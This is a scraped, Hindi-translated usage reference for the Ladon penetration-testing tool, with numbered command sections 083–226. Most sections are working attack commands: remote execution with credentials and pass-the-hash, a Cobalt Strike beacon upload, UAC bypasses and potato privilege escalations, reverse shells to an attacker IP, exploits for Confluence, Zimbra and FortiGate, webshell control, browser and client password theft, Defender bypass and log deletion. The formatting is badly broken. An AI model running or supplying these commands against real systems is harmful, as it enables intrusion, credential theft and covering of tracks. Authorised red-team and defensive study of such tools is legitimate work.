root@kitploit:~
### सूचना संग्रह

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API द्वारा वर्तमान उपयोगकर्ता देखें```Bash
Ladon w
Ladon whoami
083 स्थानीय आंतरिक नेटवर्क IP और बाहरी नेटवर्क IP प्राप्त करें```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 प्राप्त करेंPCname GUID CPUID DiskID Mac地址```Bash
Ladon GetID
085 उपयोगकर्ता द्वारा हाल ही में एक्सेस की गई फ़ाइलें देखें```Bash

Ladon Recent

root@kitploit:~
##### 086 यूएसबी ड्राइव, यूएसबी उपयोग रिकॉर्ड देखना (यूएसबी नाम, यूएसबी टैग, पथ जानकारी)```Bash
Ladon UsbLog
087 बैकडोर जांच (रजिस्ट्री स्टार्टअप आइटम, DLL अपहरण)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 प्रक्रिया विवरण (प्रोग्राम पथ, बिटनेस, प्रारंभ पैरामीटर, उपयोगकर्ता)```Bash
Ladon EnumProcess
Ladon Tasklist
089 कमांड लाइन तर्क प्राप्त करना```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 पैठ की बुनियादी जानकारी प्राप्त करें```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell संस्करण```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 रनटाइम संस्करण और संकलन पर्यावरण```Bash
Ladon Ver
Ladon Version
093 रनटाइम संस्करण&संकलन वातावरण&स्थापित सॉफ्टवेयर सूची```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 IE प्रॉक्सी जानकारी देखें```Bash
Ladon QueryProxy
095 DirList निर्देशिका सूची + मूल प्रवेश जानकारी
डिफ़ॉल्ट रूप से पूर्ण डिस्क सूची
```Bash

Ladon DirList

root@kitploit:~
###### ड्राइव अक्षर या निर्देशिका निर्दिष्ट करें```Bash
Ladon DirList c:\   
096 QueryAdmin प्रशासक उपयोगकर्ता देखें```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 स्थानीय नामित पाइप देखें```Bash
Ladon GetPipe
098 RdpLog द्वारा 3389 कनेक्शन रिकॉर्ड देखना```Bash

Ladon RdpLog

root@kitploit:~
### दूरस्थ निष्पादन(psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### 099 445 पोर्ट एन्क्रिप्टेड PSEXEC दूरस्थ कमांड निष्पादन(इंटरैक्टिव)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135 पोर्ट WmiExec रिमोट कमांड निष्पादन (गैर-संवादात्मक)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 445 पोर्ट AtExec दूरस्थ निष्पादन आदेश (गैर-इंटरैक्टिव)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 22 पोर्ट SshExec दूरस्थ कमांड निष्पादन(गैर-इंटरैक्टिव)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShell दूरस्थ कमांड निष्पादन (गैर-इंटरैक्टिव) 9.3.0 हटाया गया
Usage:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 वेबशेल दूरस्थ कमांड निष्पादन (गैर-इंटरैक्टिव) 9.3.0 में हटाया गया```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### 105 135 पोर्ट WmiExec2 रिमोट कमांड निष्पादन HASH समर्थन (गैर-संवादात्मक) फ़ाइल अपलोड समर्थन```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 445 पोर्ट SmbExec Ntlm-Hash गैर-संवादात्मक दूरस्थ निष्पादन आदेश (कोई आउटपुट नहीं)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExecदूरस्थ कमांड निष्पादन बिना प्रतिध्वनि के(System अधिकारों का समर्थन करता है)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

विशेषाधिकार उन्नयन और अवनमन

image

108 whoami वर्तमान उपयोगकर्ता अनुमतियाँ और विशेषाधिकार देखें```Bash

Ladon whoami

root@kitploit:~
##### 109  6 प्रकार के व्हाइटलिस्ट BypassUAC (8.0 के बाद) Win7-Win10  10.8 संस्करण हटाया गया केवल 911 रखा गया
उपयोग: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 UAC निष्पादन को बायपास करें, Win7-Win10 का समर्थन करता है 10.8 संस्करण हटा दिया गया केवल 911 बनाए रखा```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) प्रिंटर भेद्यता विशेषाधिकार वृद्धि EXP```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool प्रिंटर भेद्यता विशेषाधिकार वृद्धि EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem System विशेषाधिकार प्राप्त करके CMD निष्पादित करें```Bash
Ladon GetSystem cmd.exe
114 टोकन कॉपी करें CMD निष्पादित करें (जैसे system विशेषाधिकार को घटाकर exploer वर्तमान उपयोगकर्ता)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas उपयोगकर्ता के रूप में आदेश निष्पादित करें```Bash
Ladon Runas user pass cmd
116 MS16135 से SYSTEM तक विशेषाधिकार वृद्धि```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato सेवा उपयोगकर्ता से SYSTEM तक विशेषाधिकार वृद्धि```Bash
Ladon BadPotato cmdline
118 SweetPotato सेवा उपयोगकर्ता से SYSTEM तक विशेषाधिकार वृद्धि```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 विशेषाधिकार वृद्धि (सेवा उपयोगकर्ता विशेषाधिकार को system तक बढ़ाना)```Bash
Ladon EfsPotato whoami
120 Open3389 एक क्लिक से 3389 खोलें```Bash

Ladon Open3389

root@kitploit:~
##### 121 अंतर्निहित प्रशासक Administrator को सक्रिय करें```Bash
Ladon ActiveAdmin
122 अंतर्निहित उपयोगकर्ता Guest को सक्रिय करें```Bash

Ladon ActiveGuest

root@kitploit:~
### रिवर्स शेल

##### 123 रिवर्स TCP NC शेल```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 रिवर्स TCP MSF Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 रिवर्स TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 रिवर्स HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 रिवर्सHTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 रिवर्स टीसीपी सीएमडी और PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 रिवर्स UDP Cmd और PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh स्थानीय मशीन 888 पोर्ट को 112 के 22 पोर्ट पर अग्रेषित करें```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTranपोर्ट फ़ॉरवर्डिंग(3389 उदाहरण)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

स्थानीय निष्पादन

132 RDP डेस्कटॉप सत्र अपहरण (कोई पासवर्ड नहीं)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 रजिस्ट्री Run स्टार्टअप आइटम जोड़ें```Bash
Ladon RegAuto Test c:\123.exe
134 AT योजना निष्पादन प्रोग्राम (कोई समय आवश्यक नहीं) (सिस्टम अनुमति)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 SC सेवा स्टार्टअप आइटम और निष्पादन प्रोग्राम (सिस्टम अनुमतियाँ)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

सिस्टम सूचना पहचान

136 SNMP प्रोटोकॉल द्वारा ऑपरेटिंग सिस्टम, उपकरण आदि की जानकारी का पता लगाना```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Nbt प्रोटोकॉल द्वारा Windows होस्टनाम, डोमेन, उपयोगकर्ता का पता लगाना```Bash
Ladon 192.168.1.8/24 NbtInfo
138 Smb प्रोटोकॉल द्वारा Windows संस्करण, होस्टनाम, डोमेन का पता लगाना```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Wmi प्रोटोकॉल द्वारा Windows संस्करण, होस्टनाम, डोमेन का पता लगाना```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Mssql प्रोटोकॉल द्वारा Windows संस्करण, होस्टनाम, डोमेन का पता लगाना```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Winrm प्रोटोकॉल द्वारा Windows संस्करण, होस्टनाम, डोमेन का पता लगाना```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange विंडोज संस्करण, होस्टनाम, डोमेन का पता लगाना```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  RDP प्रोटोकॉल द्वारा Windows संस्करण, होस्टनाम, डोमेन का पता लगाना```Bash
Ladon 192.168.1.8/24 RdpInfo

अन्य सुविधाएँ

144 Win2008 एक-क्लिक सक्षम .net 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 आंतरिक वेबसाइट का HTML स्रोत कोड प्राप्त करें```Bash
Ladon gethtml http://192.168.1.1
146 एक-क्लिक मिनी WEB सर्वर पैठ निगरानी के लिए समर्पित WEB सर्वर```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
बाहरी IP प्राप्त करें (VPS पर WEB शुरू करें, लक्ष्य ip.txt या ip.jpg तक पहुंचे)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt (बिना प्रतिध्वनि भेद्यता प्रतिध्वनि परिणाम)
##### सुनना```Bash
Ladon web 800
सबमिट सादा पाठ लौटाएं```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Base64 एन्क्रिप्शन परिणाम```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64 परिणाम डिक्रिप्ट करें```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Shiro प्लगइन का पता लगाना```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat टॉमकैट निर्दिष्ट IP लॉग हटाएं```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 C# कस्टम असेंबली प्लगइन स्कैनिंग```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile बड़ी फ़ाइल के आरंभ से निर्दिष्ट लंबाई की सामग्री पढ़ता है```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 रजिस्ट्री को संशोधित कर 2012 एवं बाद के सिस्टम के सादे पाठ पासवर्ड पढ़ें```Bash
Ladon SetMzLogonPwd 1
153 रजिस्ट्री अपहरण हस्ताक्षर वीज़ा संशोधित करें```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 बैच IP को ip24 प्रारूप में बदलें (192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC बैच IP को IP C प्रारूप में बदलें (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB बैच IP को IP B प्रारूप में बदलें (192.168.)```Bash
Ladon ip.txt IPB
157 भेद्यता पहचानAtlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134रिवर्सशेल```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo प्रमाणपत्र जांच उपकरण, आईपी, डोमेन नाम, मशीन नाम, संगठन और अन्य जानकारी```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo प्रमाणपत्र बैच जांच उपकरण, आईपी, डोमेन नाम, मशीन नाम, संगठन आदि की जानकारी```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo WordPress कोर, थीम, प्लगइन संस्करण प्राप्त करने के कई तरीके```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo बल्क में WordPress कोर, थीम, प्लगइन संस्करण प्राप्त करें```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Exchange ब्रूट फोर्स Exchange पासवर्ड ब्रूट फोर्स पहचानें```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 बैच जांच Zimbra मेल सर्वर ZIP निर्देशिका ट्रैवर्सल RCE भेद्यता```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra ईमेल सर्वर अनधिकृत RCE भेद्यता EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd jsp WebShell से कनेक्ट करें (cd, k8, ua, uab64 समर्थित हैं)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell सिस्टम संस्करण, python, gcc और अन्य जानकारी आसानी से विशेषाधिकार वृद्धि के लिए देखें```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd jsp WebShell से जुड़ें (समर्थन: cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 गैर-संवादात्मक कनेक्शन IIS-Raid बैकडोर कमांड निष्पादित करें```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP IP खंड भेद्यता परिणामों में प्रकट होता है या नहीं```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 राउटर पासवर्ड पढ़ना```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc प्रिंटर PJL मनमाना कोड निष्पादन भेद्यता बैच जांच```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 मैक पते के माध्यम से निर्माता खोजें (Ladon Mac मैक पता)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPN राउटर पासवर्ड क्रैकिंग (अंतर्निहित डिफ़ॉल्ट पासवर्ड, सादा टेक्स्ट और हैश का समर्थन करता है)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 स्माइली बैकडोर भेद्यता का पता लगाना  10.9 में हटाया गया```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress पासवर्ड ऑडिट, कमज़ोर पासवर्ड```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Exchange संस्करण का पता लगाएं```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Exchange उच्च जोखिम RCE भेद्यता का पता लगाना```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Http/S वेब पेज रिटर्न हेडर जानकारी प्राप्त करें```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S वेब पेज शीर्षक जानकारी और स्रोत कोड प्राप्त करें```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S वेबपेज से डोमेन नाम प्राप्त करें```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP CDN को बायपास करके डोमेन का वास्तविक IP प्राप्त करें (उपयोग करने योग्य डोमेन, शीर्षक, बैनर और अन्य अद्वितीय कीवर्ड विशेषताएँ)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Firefox पासवर्ड\Cookie\इतिहास पढ़ना```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 बिना प्रतिक्रिया समर्थन Win7, Win8, Win11 Win2012\2016\2019 आदि 10.8 संस्करण हटा दिया गया```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd Navicat、TeamView、Xshell、SecureCRT पासवर्ड पढ़ने का समर्थन करता है```Bash
Ladon GetPwd
186 DraytekScan पासवर्ड ऑडिट Draytek कमजोर पासवर्ड जांच```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Xshell पासवर्ड पढ़ना```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 अनधिकृत SSH-KEY लेखन admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  SQL Server दूरस्थ कमांड निष्पादन SQL संस्करण, OS जानकारी xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Server दूरस्थ कमांड निष्पादन efspotato, badpotato विशेषाधिकार वृद्धि```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 संस्करण पासवर्ड निकालना```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan ZTE राउटर और ऑप्टिकल मॉडम वेब डिफ़ॉल्ट पासवर्ड जांच```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitch राउटर पासवर्ड पढ़ना```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd NetGear DGND3700v2 राउटर पासवर्ड पढ़ना```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 T3 प्रोटोकॉल द्वारा WebLogic संस्करण का पता लगाना```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

एक क्लिक पेनिट्रेशन InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan एकाधिक मॉड्यूल सिस्टम जानकारी का पता लगाते हैं```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan एकाधिक दूरस्थ कमजोरी पता लगाना```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan एकाधिक भेद्यता शोषण GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 अनधिकृत वेबसाइट डेटाबेस पासवर्ड पढ़ना```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan सभी मॉड्यूल```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Citrix Gateway संस्करण का पता लगाएं```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Vmware Vcenter संस्करण का पता लगाएं```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 डिफ़ेंडर को बायपास कर पावरशेल चलाएं```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMP HP प्रिंटर पुनरारंभ```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 सफाई संचालन लॉग.NET लॉगिंग अक्षम करें```Bash
Ladon Clslog
206 ARP प्रोटोकॉल द्वारा जीवित होस्ट का पता लगाना```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 मिनी FTP सर्वर, (Windows/Linux में निर्मित ftp कमांड के साथ फ़ाइल अपलोड और डाउनलोड का समर्थन करता है)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 TCP पैकेट डेटा की निगरानी करें और TXT तथा HEX में सहेजें जैसे SMB, RDP, HTTP, SSH, LDAP, FTP आदि प्रोटोकॉल```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 UDP आउटगोइंग पैकेट डेटा मॉनिटर करें, TXT और HEX में सेव करें, जैसे DNS, SNMP प्रोटोकॉल```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward पोर्ट फ़ॉरवर्डिंग पोर्ट रिले```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager अनधिकृत RCE भेद्यता का पता लगाना (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper अनधिकृत फ़ाइल पढ़ने का EXP (डिफ़ॉल्ट/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 SMB को पूरी तरह से बंद करें, 445 को अक्षम करें, 0day, पार्श्व आंदोलन, रिले हमले आदि को रोकें```Bash
Ladon CloseSMB
214 निर्दिष्ट सेवा अक्षम करें```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 निर्दिष्ट सेवा रोकें```Bash
Ladon StopService Spooler
216 अनुमति पोर्ट खुला पोर्ट```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 पोर्ट रोकें पोर्ट इंटरसेप्ट करें```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken टोकन कॉपी निष्पादन प्रोग्राम```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem प्रिविलेज एस्केलेशन एडमिनिस्ट्रेटर अधिकारों को SYSTEM अधिकारों में उन्नत करें```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser विशेषाधिकार घटाना System अनुमति उपयोगकर्ता प्रोग्राम निष्पादन तक```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato विशेषाधिकार वृद्धि Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision 海康威视 पासवर्ड ऑडिट```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision हिकविज़न CVE-2017-7921 भेद्यता जांच```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision 海康威视 कॉन्फ़िगरेशन फ़ाइल डिक्रिप्शन```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon परीक्षण विशेष CmdShell```Bash
Ladon web 800 cmd
226 कनेक्शन परीक्षण के लिए समर्पित CmdShell```Bash

